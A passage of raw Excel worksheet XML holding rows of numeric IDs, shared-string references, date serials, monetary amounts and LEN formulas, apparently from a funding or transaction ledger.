      <c r="A1869">
        <v>20068</v>
      </c>
      <c r="B1869">
        <v>2661</v>
      </c>
      <c r="C1869" t="s">
        <v>3761</v>
      </c>
      <c r="D1869" t="s">
        <v>10451</v>
      </c>
      <c r="E1869">
        <v>32</v>
      </c>
      <c r="F1869" t="s">
        <v>10454</v>
      </c>
      <c r="G1869" s="1">
        <v>43908</v>
      </c>
      <c r="H1869">
        <v>10000</v>
      </c>
      <c r="K1869">
        <f>LEN(I1869)</f>
        <v>0</v>
      </c>
      <c r="L1869">
        <f>LEN(J1869)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1870" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1870">
        <v>20072</v>
      </c>
      <c r="B1870">
        <v>290</v>
      </c>
      <c r="C1870" t="s">
        <v>98</v>
      </c>
      <c r="D1870" t="s">
        <v>10292</v>
      </c>
      <c r="E1870">
        <v>12</v>
      </c>
      <c r="F1870" t="s">
        <v>9941</v>
      </c>
      <c r="G1870" s="1">
        <v>43892</v>
      </c>
      <c r="H1870">
        <v>320</v>
      </c>
      <c r="K1870">
        <f>LEN(I1870)</f>
        <v>0</v>
      </c>
      <c r="L1870">
        <f>LEN(J1870)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1871" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1871">
        <v>20074</v>
      </c>
      <c r="B1871">
        <v>290</v>
      </c>
      <c r="C1871" t="s">
        <v>98</v>
      </c>
      <c r="D1871" t="s">
        <v>10292</v>
      </c>
      <c r="E1871">
        <v>12</v>
      </c>
      <c r="F1871" t="s">
        <v>10458</v>
      </c>
      <c r="G1871" s="1">
        <v>43892</v>
      </c>
      <c r="H1871">
        <v>70</v>
      </c>
      <c r="K1871">
        <f>LEN(I1871)</f>
        <v>0</v>
      </c>
      <c r="L1871">
        <f>LEN(J1871)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1872" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1872">
        <v>20141</v>
      </c>
      <c r="B1872">
        <v>782</v>
      </c>
      <c r="C1872" t="s">
        <v>725</v>
      </c>
      <c r="D1872" t="s">
        <v>10500</v>
      </c>
      <c r="E1872">
        <v>32</v>
      </c>
      <c r="F1872" t="s">
        <v>2236</v>
      </c>
      <c r="G1872" s="1">
        <v>43910</v>
      </c>
      <c r="H1872">
        <v>10000</v>
      </c>
      <c r="K1872">
        <f>LEN(I1872)</f>
        <v>0</v>
      </c>
      <c r="L1872">
        <f>LEN(J1872)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1873" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1873">
        <v>20142</v>
      </c>
      <c r="B1873">
        <v>782</v>
      </c>
      <c r="C1873" t="s">
        <v>725</v>
      </c>
      <c r="D1873" t="s">
        <v>10500</v>
      </c>
      <c r="E1873">
        <v>32</v>
      </c>
      <c r="F1873" t="s">
        <v>10502</v>
      </c>
      <c r="G1873" s="1">
        <v>43910</v>
      </c>
      <c r="H1873">
        <v>16000</v>
      </c>
      <c r="K1873">
        <f>LEN(I1873)</f>
        <v>0</v>
      </c>
      <c r="L1873">
        <f>LEN(J1873)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1874" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1874">
        <v>20143</v>
      </c>
      <c r="B1874">
        <v>782</v>
      </c>
      <c r="C1874" t="s">
        <v>725</v>
      </c>
      <c r="D1874" t="s">
        <v>10500</v>
      </c>
      <c r="E1874">
        <v>32</v>
      </c>
      <c r="F1874" t="s">
        <v>4686</v>
      </c>
      <c r="G1874" s="1">
        <v>43910</v>
      </c>
      <c r="H1874">
        <v>10000</v>
      </c>
      <c r="K1874">
        <f>LEN(I1874)</f>
        <v>0</v>
      </c>
      <c r="L1874">
        <f>LEN(J1874)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1875" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1875">
        <v>20144</v>
      </c>
      <c r="B1875">
        <v>782</v>
      </c>
      <c r="C1875" t="s">
        <v>725</v>
      </c>
      <c r="D1875" t="s">
        <v>10500</v>
      </c>
      <c r="E1875">
        <v>32</v>
      </c>
      <c r="F1875" t="s">
        <v>10348</v>
      </c>
      <c r="G1875" s="1">
        <v>43910</v>
      </c>
      <c r="H1875">
        <v>5000</v>
      </c>
      <c r="K1875">
        <f>LEN(I1875)</f>
        <v>0</v>
      </c>
      <c r="L1875">
        <f>LEN(J1875)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1876" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1876">
        <v>20183</v>
      </c>
      <c r="B1876">
        <v>367</v>
      </c>
      <c r="C1876" t="s">
        <v>744</v>
      </c>
      <c r="D1876" t="s">
        <v>10528</v>
      </c>
      <c r="E1876">
        <v>14</v>
      </c>
      <c r="F1876" t="s">
        <v>10529</v>
      </c>
      <c r="G1876" s="1">
        <v>44217</v>
      </c>
      <c r="H1876">
        <v>6300</v>
      </c>
      <c r="K1876">
        <f>LEN(I1876)</f>
        <v>0</v>
      </c>
      <c r="L1876">
        <f>LEN(J1876)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1877" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1877">
        <v>20198</v>
      </c>
      <c r="B1877">
        <v>237</v>
      </c>
      <c r="C1877" t="s">
        <v>798</v>
      </c>
      <c r="D1877" t="s">
        <v>10537</v>
      </c>
      <c r="E1877">
        <v>16</v>
      </c>
      <c r="F1877" t="s">
        <v>10543</v>
      </c>
      <c r="G1877" s="1">
        <v>43921</v>
      </c>
      <c r="H1877">
        <v>50000</v>
      </c>
      <c r="K1877">
        <f>LEN(I1877)</f>
        <v>0</v>
      </c>
      <c r="L1877">
        <f>LEN(J1877)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1878" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1878">
        <v>20326</v>
      </c>
      <c r="B1878">
        <v>2546</v>
      </c>
      <c r="C1878" t="s">
        <v>5339</v>
      </c>
      <c r="D1878" t="s">
        <v>10229</v>
      </c>
      <c r="E1878">
        <v>5</v>
      </c>
      <c r="F1878" t="s">
        <v>10629</v>
      </c>
      <c r="G1878" s="1">
        <v>43896</v>
      </c>
      <c r="H1878">
        <v>100000</v>
      </c>
      <c r="K1878">
        <f>LEN(I1878)</f>
        <v>0</v>
      </c>
      <c r="L1878">
        <f>LEN(J1878)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1879" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1879">
        <v>20371</v>
      </c>
      <c r="B1879">
        <v>2734</v>
      </c>
      <c r="C1879" t="s">
        <v>6018</v>
      </c>
      <c r="D1879" t="s">
        <v>10661</v>
      </c>
      <c r="E1879">
        <v>14</v>
      </c>
      <c r="F1879" t="s">
        <v>10543</v>
      </c>
      <c r="G1879" s="1">
        <v>44048</v>
      </c>
      <c r="H1879">
        <v>200</v>
      </c>
      <c r="K1879">
        <f>LEN(I1879)</f>
        <v>0</v>
      </c>
      <c r="L1879">
        <f>LEN(J1879)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1880" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1880">
        <v>20380</v>
      </c>
      <c r="B1880">
        <v>333</v>
      </c>
      <c r="C1880" t="s">
        <v>923</v>
      </c>
      <c r="D1880" t="s">
        <v>10672</v>
      </c>
      <c r="E1880">
        <v>15</v>
      </c>
      <c r="F1880" t="s">
        <v>925</v>
      </c>
      <c r="G1880" s="1">
        <v>43916</v>
      </c>
      <c r="H1880">
        <v>1000</v>
      </c>
      <c r="K1880">
        <f>LEN(I1880)</f>
        <v>0</v>
      </c>
      <c r="L1880">
        <f>LEN(J1880)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1881" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1881">
        <v>20400</v>
      </c>
      <c r="B1881">
        <v>159</v>
      </c>
      <c r="C1881" t="s">
        <v>109</v>
      </c>
      <c r="D1881" t="s">
        <v>10687</v>
      </c>
      <c r="E1881">
        <v>12</v>
      </c>
      <c r="F1881" t="s">
        <v>3076</v>
      </c>
      <c r="G1881" s="1">
        <v>43907</v>
      </c>
      <c r="H1881">
        <v>0</v>
      </c>
      <c r="K1881">
        <f>LEN(I1881)</f>
        <v>0</v>
      </c>
      <c r="L1881">
        <f>LEN(J1881)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1882" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1882">
        <v>20528</v>
      </c>
      <c r="B1882">
        <v>2235</v>
      </c>
      <c r="C1882" t="s">
        <v>5933</v>
      </c>
      <c r="D1882" t="s">
        <v>10775</v>
      </c>
      <c r="E1882">
        <v>13</v>
      </c>
      <c r="F1882" t="s">
        <v>673</v>
      </c>
      <c r="G1882" s="1">
        <v>43956</v>
      </c>
      <c r="H1882">
        <v>25000</v>
      </c>
      <c r="K1882">
        <f>LEN(I1882)</f>
        <v>0</v>
      </c>
      <c r="L1882">
        <f>LEN(J1882)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1883" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1883">
        <v>20576</v>
      </c>
      <c r="B1883">
        <v>2719</v>
      </c>
      <c r="C1883" t="s">
        <v>6860</v>
      </c>
      <c r="D1883" t="s">
        <v>10823</v>
      </c>
      <c r="E1883">
        <v>13</v>
      </c>
      <c r="F1883" t="s">
        <v>10825</v>
      </c>
      <c r="G1883" s="1">
        <v>44007</v>
      </c>
      <c r="H1883">
        <v>0</v>
      </c>
      <c r="K1883">
        <f>LEN(I1883)</f>
        <v>0</v>
      </c>
      <c r="L1883">
        <f>LEN(J1883)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1884" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1884">
        <v>20578</v>
      </c>
      <c r="B1884">
        <v>2719</v>
      </c>
      <c r="C1884" t="s">
        <v>6860</v>
      </c>
      <c r="D1884" t="s">
        <v>10823</v>
      </c>
      <c r="E1884">
        <v>13</v>
      </c>
      <c r="F1884" t="s">
        <v>10827</v>
      </c>
      <c r="G1884" s="1">
        <v>44007</v>
      </c>
      <c r="H1884">
        <v>0</v>
      </c>
      <c r="K1884">
        <f>LEN(I1884)</f>
        <v>0</v>
      </c>
      <c r="L1884">
        <f>LEN(J1884)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1885" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1885">
        <v>20595</v>
      </c>
      <c r="B1885">
        <v>882</v>
      </c>
      <c r="C1885" t="s">
        <v>2992</v>
      </c>
      <c r="D1885" t="s">
        <v>10834</v>
      </c>
      <c r="E1885">
        <v>2</v>
      </c>
      <c r="F1885" t="s">
        <v>9595</v>
      </c>
      <c r="G1885" s="1">
        <v>43991</v>
      </c>
      <c r="H1885">
        <v>655</v>
      </c>
      <c r="K1885">
        <f>LEN(I1885)</f>
        <v>0</v>
      </c>
      <c r="L1885">
        <f>LEN(J1885)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1886" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1886">
        <v>20634</v>
      </c>
      <c r="B1886">
        <v>768</v>
      </c>
      <c r="C1886" t="s">
        <v>16319</v>
      </c>
      <c r="D1886" t="s">
        <v>16320</v>
      </c>
      <c r="E1886">
        <v>16</v>
      </c>
      <c r="F1886" t="s">
        <v>10803</v>
      </c>
      <c r="G1886" s="1">
        <v>44032</v>
      </c>
      <c r="H1886" s="4">
        <v>585000</v>
      </c>
      <c r="K1886">
        <f>LEN(I1886)</f>
        <v>0</v>
      </c>
      <c r="L1886">
        <f>LEN(J1886)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1887" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1887">
        <v>20686</v>
      </c>
      <c r="B1887">
        <v>2772</v>
      </c>
      <c r="C1887" t="s">
        <v>4132</v>
      </c>
      <c r="D1887" t="s">
        <v>10886</v>
      </c>
      <c r="E1887">
        <v>16</v>
      </c>
      <c r="F1887" t="s">
        <v>10887</v>
      </c>
      <c r="G1887" s="1">
        <v>43945</v>
      </c>
      <c r="H1887">
        <v>480000</v>
      </c>
      <c r="K1887">
        <f>LEN(I1887)</f>
        <v>0</v>
      </c>
      <c r="L1887">
        <f>LEN(J1887)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1888" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1888">
        <v>20838</v>
      </c>
      <c r="B1888">
        <v>2097</v>
      </c>
      <c r="C1888" t="s">
        <v>6070</v>
      </c>
      <c r="D1888" t="s">
        <v>11022</v>
      </c>
      <c r="E1888">
        <v>2</v>
      </c>
      <c r="F1888" t="s">
        <v>9527</v>
      </c>
      <c r="G1888" s="1">
        <v>44061</v>
      </c>
      <c r="H1888">
        <v>500000</v>
      </c>
      <c r="K1888">
        <f>LEN(I1888)</f>
        <v>0</v>
      </c>
      <c r="L1888">
        <f>LEN(J1888)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1889" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1889">
        <v>20847</v>
      </c>
      <c r="B1889">
        <v>538</v>
      </c>
      <c r="C1889" t="s">
        <v>824</v>
      </c>
      <c r="D1889" t="s">
        <v>11032</v>
      </c>
      <c r="E1889">
        <v>11</v>
      </c>
      <c r="F1889" t="s">
        <v>2288</v>
      </c>
      <c r="G1889" s="1">
        <v>44012</v>
      </c>
      <c r="H1889">
        <v>0</v>
      </c>
      <c r="K1889">
        <f>LEN(I1889)</f>
        <v>0</v>
      </c>
      <c r="L1889">
        <f>LEN(J1889)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1890" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1890">
        <v>21169</v>
      </c>
      <c r="B1890">
        <v>541</v>
      </c>
      <c r="C1890" t="s">
        <v>1159</v>
      </c>
      <c r="D1890" t="s">
        <v>11179</v>
      </c>
      <c r="E1890">
        <v>16</v>
      </c>
      <c r="F1890" t="s">
        <v>9472</v>
      </c>
      <c r="G1890" s="1">
        <v>44034</v>
      </c>
      <c r="H1890">
        <v>6000</v>
      </c>
      <c r="K1890">
        <f>LEN(I1890)</f>
        <v>0</v>
      </c>
      <c r="L1890">
        <f>LEN(J1890)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1891" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1891">
        <v>21216</v>
      </c>
      <c r="B1891">
        <v>4776</v>
      </c>
      <c r="C1891" t="s">
        <v>7120</v>
      </c>
      <c r="D1891" t="s">
        <v>11211</v>
      </c>
      <c r="E1891">
        <v>12</v>
      </c>
      <c r="F1891" t="s">
        <v>9595</v>
      </c>
      <c r="G1891" s="1">
        <v>44028</v>
      </c>
      <c r="H1891">
        <v>0</v>
      </c>
      <c r="K1891">
        <f>LEN(I1891)</f>
        <v>0</v>
      </c>
      <c r="L1891">
        <f>LEN(J1891)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1892" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1892">
        <v>21222</v>
      </c>
      <c r="B1892">
        <v>4776</v>
      </c>
      <c r="C1892" t="s">
        <v>7120</v>
      </c>
      <c r="D1892" t="s">
        <v>11211</v>
      </c>
      <c r="E1892">
        <v>12</v>
      </c>
      <c r="F1892" t="s">
        <v>9925</v>
      </c>
      <c r="G1892" s="1">
        <v>44028</v>
      </c>
      <c r="H1892">
        <v>0</v>
      </c>
      <c r="K1892">
        <f>LEN(I1892)</f>
        <v>0</v>
      </c>
      <c r="L1892">
        <f>LEN(J1892)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1893" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1893">
        <v>21223</v>
      </c>
      <c r="B1893">
        <v>4776</v>
      </c>
      <c r="C1893" t="s">
        <v>7120</v>
      </c>
      <c r="D1893" t="s">
        <v>11211</v>
      </c>
      <c r="E1893">
        <v>12</v>
      </c>
      <c r="F1893" t="s">
        <v>9435</v>
      </c>
      <c r="G1893" s="1">
        <v>44028</v>
      </c>
      <c r="H1893">
        <v>0</v>
      </c>
      <c r="K1893">
        <f>LEN(I1893)</f>
        <v>0</v>
      </c>
      <c r="L1893">
        <f>LEN(J1893)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1894" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1894">
        <v>21224</v>
      </c>
      <c r="B1894">
        <v>4776</v>
      </c>
      <c r="C1894" t="s">
        <v>7120</v>
      </c>
      <c r="D1894" t="s">
        <v>11211</v>
      </c>
      <c r="E1894">
        <v>12</v>
      </c>
      <c r="F1894" t="s">
        <v>2236</v>
      </c>
      <c r="G1894" s="1">
        <v>44028</v>
      </c>
      <c r="H1894">
        <v>681</v>
      </c>
      <c r="K1894">
        <f>LEN(I1894)</f>
        <v>0</v>
      </c>
      <c r="L1894">
        <f>LEN(J1894)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1895" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1895">
        <v>21255</v>
      </c>
      <c r="B1895">
        <v>909</v>
      </c>
      <c r="C1895" t="s">
        <v>3179</v>
      </c>
      <c r="D1895" t="s">
        <v>11255</v>
      </c>
      <c r="E1895">
        <v>12</v>
      </c>
      <c r="F1895" t="s">
        <v>11256</v>
      </c>
      <c r="G1895" s="1">
        <v>44088</v>
      </c>
      <c r="H1895">
        <v>5000</v>
      </c>
      <c r="K1895">
        <f>LEN(I1895)</f>
        <v>0</v>
      </c>
      <c r="L1895">
        <f>LEN(J1895)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1896" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1896">
        <v>21287</v>
      </c>
      <c r="B1896">
        <v>444</v>
      </c>
      <c r="C1896" t="s">
        <v>1595</v>
      </c>
      <c r="D1896" t="s">
        <v>11264</v>
      </c>
      <c r="E1896">
        <v>16</v>
      </c>
      <c r="F1896" t="s">
        <v>11267</v>
      </c>
      <c r="G1896" s="1">
        <v>44155</v>
      </c>
      <c r="H1896">
        <v>24000</v>
      </c>
      <c r="K1896">
        <f>LEN(I1896)</f>
        <v>0</v>
      </c>
      <c r="L1896">
        <f>LEN(J1896)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1897" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1897">
        <v>21289</v>
      </c>
      <c r="B1897">
        <v>444</v>
      </c>
      <c r="C1897" t="s">
        <v>1595</v>
      </c>
      <c r="D1897" t="s">
        <v>11264</v>
      </c>
      <c r="E1897">
        <v>16</v>
      </c>
      <c r="F1897" t="s">
        <v>9595</v>
      </c>
      <c r="G1897" s="1">
        <v>44155</v>
      </c>
      <c r="H1897">
        <v>0</v>
      </c>
      <c r="K1897">
        <f>LEN(I1897)</f>
        <v>0</v>
      </c>
      <c r="L1897">
        <f>LEN(J1897)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1898" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1898">
        <v>21346</v>
      </c>
      <c r="B1898">
        <v>49</v>
      </c>
      <c r="C1898" t="s">
        <v>1612</v>
      </c>
      <c r="D1898" t="s">
        <v>11322</v>
      </c>
      <c r="E1898">
        <v>12</v>
      </c>
      <c r="F1898" t="s">
        <v>9458</v>
      </c>
      <c r="G1898" s="1">
        <v>44067</v>
      </c>
      <c r="H1898">
        <v>10000</v>
      </c>
      <c r="K1898">
        <f>LEN(I1898)</f>
        <v>0</v>
      </c>
      <c r="L1898">
        <f>LEN(J1898)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1899" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1899">
        <v>21377</v>
      </c>
      <c r="B1899">
        <v>469</v>
      </c>
      <c r="C1899" t="s">
        <v>1626</v>
      </c>
      <c r="D1899" t="s">
        <v>11336</v>
      </c>
      <c r="E1899">
        <v>12</v>
      </c>
      <c r="F1899" t="s">
        <v>9491</v>
      </c>
      <c r="G1899" s="1">
        <v>44075</v>
      </c>
      <c r="H1899">
        <v>0</v>
      </c>
      <c r="K1899">
        <f>LEN(I1899)</f>
        <v>0</v>
      </c>
      <c r="L1899">
        <f>LEN(J1899)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1900" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1900">
        <v>21403</v>
      </c>
      <c r="B1900">
        <v>131</v>
      </c>
      <c r="C1900" t="s">
        <v>1427</v>
      </c>
      <c r="D1900" t="s">
        <v>11367</v>
      </c>
      <c r="E1900">
        <v>12</v>
      </c>
      <c r="F1900" t="s">
        <v>11368</v>
      </c>
      <c r="G1900" s="1">
        <v>44147</v>
      </c>
      <c r="H1900">
        <v>150000</v>
      </c>
    </row>
    <row r="1901" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1901">
        <v>21404</v>
      </c>
      <c r="B1901">
        <v>131</v>
      </c>
      <c r="C1901" t="s">
        <v>1427</v>
      </c>
      <c r="D1901" t="s">
        <v>11367</v>
      </c>
      <c r="E1901">
        <v>12</v>
      </c>
      <c r="F1901" t="s">
        <v>10130</v>
      </c>
      <c r="G1901" s="1">
        <v>44147</v>
      </c>
      <c r="H1901">
        <v>150000</v>
      </c>
    </row>
    <row r="1902" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1902">
        <v>21405</v>
      </c>
      <c r="B1902">
        <v>131</v>
      </c>
      <c r="C1902" t="s">
        <v>1427</v>
      </c>
      <c r="D1902" t="s">
        <v>11367</v>
      </c>
      <c r="E1902">
        <v>12</v>
      </c>
      <c r="F1902" t="s">
        <v>4686</v>
      </c>
      <c r="G1902" s="1">
        <v>44147</v>
      </c>
      <c r="H1902">
        <v>100000</v>
      </c>
    </row>
    <row r="1903" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1903">
        <v>21406</v>
      </c>
      <c r="B1903">
        <v>131</v>
      </c>
      <c r="C1903" t="s">
        <v>1427</v>
      </c>
      <c r="D1903" t="s">
        <v>11367</v>
      </c>
      <c r="E1903">
        <v>12</v>
      </c>
      <c r="F1903" t="s">
        <v>11369</v>
      </c>
      <c r="G1903" s="1">
        <v>44147</v>
      </c>
      <c r="H1903">
        <v>150000</v>
      </c>
    </row>
    <row r="1904" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1904">
        <v>21407</v>
      </c>
      <c r="B1904">
        <v>131</v>
      </c>
      <c r="C1904" t="s">
        <v>1427</v>
      </c>
      <c r="D1904" t="s">
        <v>11367</v>
      </c>
      <c r="E1904">
        <v>12</v>
      </c>
      <c r="F1904" t="s">
        <v>9466</v>
      </c>
      <c r="G1904" s="1">
        <v>44147</v>
      </c>
      <c r="H1904">
        <v>150000</v>
      </c>
    </row>
    <row r="1905" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1905">
        <v>21408</v>
      </c>
      <c r="B1905">
        <v>131</v>
      </c>
      <c r="C1905" t="s">
        <v>1427</v>
      </c>
      <c r="D1905" t="s">
        <v>11367</v>
      </c>
      <c r="E1905">
        <v>12</v>
      </c>
      <c r="F1905" t="s">
        <v>9681</v>
      </c>
      <c r="G1905" s="1">
        <v>44147</v>
      </c>
      <c r="H1905">
        <v>150000</v>
      </c>
    </row>
    <row r="1906" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1906">
        <v>21409</v>
      </c>
      <c r="B1906">
        <v>131</v>
      </c>
      <c r="C1906" t="s">
        <v>1427</v>
      </c>
      <c r="D1906" t="s">
        <v>11367</v>
      </c>
      <c r="E1906">
        <v>12</v>
      </c>
      <c r="F1906" t="s">
        <v>9523</v>
      </c>
      <c r="G1906" s="1">
        <v>44147</v>
      </c>
      <c r="H1906">
        <v>150000</v>
      </c>
    </row>
    <row r="1907" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1907">
        <v>21410</v>
      </c>
      <c r="B1907">
        <v>131</v>
      </c>
      <c r="C1907" t="s">
        <v>1427</v>
      </c>
      <c r="D1907" t="s">
        <v>11367</v>
      </c>
      <c r="E1907">
        <v>12</v>
      </c>
      <c r="F1907" t="s">
        <v>9460</v>
      </c>
      <c r="G1907" s="1">
        <v>44147</v>
      </c>
      <c r="H1907">
        <v>100000</v>
      </c>
    </row>
    <row r="1908" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1908">
        <v>21411</v>
      </c>
      <c r="B1908">
        <v>131</v>
      </c>
      <c r="C1908" t="s">
        <v>1427</v>
      </c>
      <c r="D1908" t="s">
        <v>11367</v>
      </c>
      <c r="E1908">
        <v>12</v>
      </c>
      <c r="F1908" t="s">
        <v>764</v>
      </c>
      <c r="G1908" s="1">
        <v>44147</v>
      </c>
      <c r="H1908">
        <v>1000000000</v>
      </c>
    </row>
    <row r="1909" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1909">
        <v>21412</v>
      </c>
      <c r="B1909">
        <v>131</v>
      </c>
      <c r="C1909" t="s">
        <v>1427</v>
      </c>
      <c r="D1909" t="s">
        <v>11367</v>
      </c>
      <c r="E1909">
        <v>12</v>
      </c>
      <c r="F1909" t="s">
        <v>9435</v>
      </c>
      <c r="G1909" s="1">
        <v>44147</v>
      </c>
      <c r="H1909">
        <v>150000</v>
      </c>
    </row>
    <row r="1910" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1910">
        <v>21413</v>
      </c>
      <c r="B1910">
        <v>131</v>
      </c>
      <c r="C1910" t="s">
        <v>1427</v>
      </c>
      <c r="D1910" t="s">
        <v>11367</v>
      </c>
      <c r="E1910">
        <v>12</v>
      </c>
      <c r="F1910" t="s">
        <v>10067</v>
      </c>
      <c r="G1910" s="1">
        <v>44147</v>
      </c>
      <c r="H1910">
        <v>150000</v>
      </c>
    </row>
    <row r="1911" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1911">
        <v>21414</v>
      </c>
      <c r="B1911">
        <v>131</v>
      </c>
      <c r="C1911" t="s">
        <v>1427</v>
      </c>
      <c r="D1911" t="s">
        <v>11367</v>
      </c>
      <c r="E1911">
        <v>12</v>
      </c>
      <c r="F1911" t="s">
        <v>9217</v>
      </c>
      <c r="G1911" s="1">
        <v>44147</v>
      </c>
      <c r="H1911">
        <v>150000</v>
      </c>
    </row>
    <row r="1912" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1912">
        <v>21415</v>
      </c>
      <c r="B1912">
        <v>131</v>
      </c>
      <c r="C1912" t="s">
        <v>1427</v>
      </c>
      <c r="D1912" t="s">
        <v>11367</v>
      </c>
      <c r="E1912">
        <v>12</v>
      </c>
      <c r="F1912" t="s">
        <v>9458</v>
      </c>
      <c r="G1912" s="1">
        <v>44147</v>
      </c>
      <c r="H1912">
        <v>150000</v>
      </c>
    </row>
    <row r="1913" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1913">
        <v>21416</v>
      </c>
      <c r="B1913">
        <v>131</v>
      </c>
      <c r="C1913" t="s">
        <v>1427</v>
      </c>
      <c r="D1913" t="s">
        <v>11367</v>
      </c>
      <c r="E1913">
        <v>12</v>
      </c>
      <c r="F1913" t="s">
        <v>9892</v>
      </c>
      <c r="G1913" s="1">
        <v>44147</v>
      </c>
      <c r="H1913">
        <v>1000000000</v>
      </c>
    </row>
    <row r="1914" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1914">
        <v>21417</v>
      </c>
      <c r="B1914">
        <v>131</v>
      </c>
      <c r="C1914" t="s">
        <v>1427</v>
      </c>
      <c r="D1914" t="s">
        <v>11367</v>
      </c>
      <c r="E1914">
        <v>12</v>
      </c>
      <c r="F1914" t="s">
        <v>10274</v>
      </c>
      <c r="G1914" s="1">
        <v>44147</v>
      </c>
      <c r="H1914">
        <v>100000</v>
      </c>
    </row>
    <row r="1915" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1915">
        <v>21418</v>
      </c>
      <c r="B1915">
        <v>131</v>
      </c>
      <c r="C1915" t="s">
        <v>1427</v>
      </c>
      <c r="D1915" t="s">
        <v>11367</v>
      </c>
      <c r="E1915">
        <v>12</v>
      </c>
      <c r="F1915" t="s">
        <v>9595</v>
      </c>
      <c r="G1915" s="1">
        <v>44147</v>
      </c>
      <c r="H1915">
        <v>150000</v>
      </c>
    </row>
    <row r="1916" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1916">
        <v>21419</v>
      </c>
      <c r="B1916">
        <v>131</v>
      </c>
      <c r="C1916" t="s">
        <v>1427</v>
      </c>
      <c r="D1916" t="s">
        <v>11367</v>
      </c>
      <c r="E1916">
        <v>12</v>
      </c>
      <c r="F1916" t="s">
        <v>9438</v>
      </c>
      <c r="G1916" s="1">
        <v>44147</v>
      </c>
      <c r="H1916">
        <v>200000</v>
      </c>
    </row>
    <row r="1917" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1917">
        <v>21420</v>
      </c>
      <c r="B1917">
        <v>131</v>
      </c>
      <c r="C1917" t="s">
        <v>1427</v>
      </c>
      <c r="D1917" t="s">
        <v>11367</v>
      </c>
      <c r="E1917">
        <v>12</v>
      </c>
      <c r="F1917" t="s">
        <v>9577</v>
      </c>
      <c r="G1917" s="1">
        <v>44147</v>
      </c>
      <c r="H1917">
        <v>150000</v>
      </c>
    </row>
    <row r="1918" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1918">
        <v>21421</v>
      </c>
      <c r="B1918">
        <v>131</v>
      </c>
      <c r="C1918" t="s">
        <v>1427</v>
      </c>
      <c r="D1918" t="s">
        <v>11367</v>
      </c>
      <c r="E1918">
        <v>12</v>
      </c>
      <c r="F1918" t="s">
        <v>1030</v>
      </c>
      <c r="G1918" s="1">
        <v>44147</v>
      </c>
      <c r="H1918">
        <v>100000</v>
      </c>
    </row>
    <row r="1919" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A1919">
        <v>21422</v>
      </c>
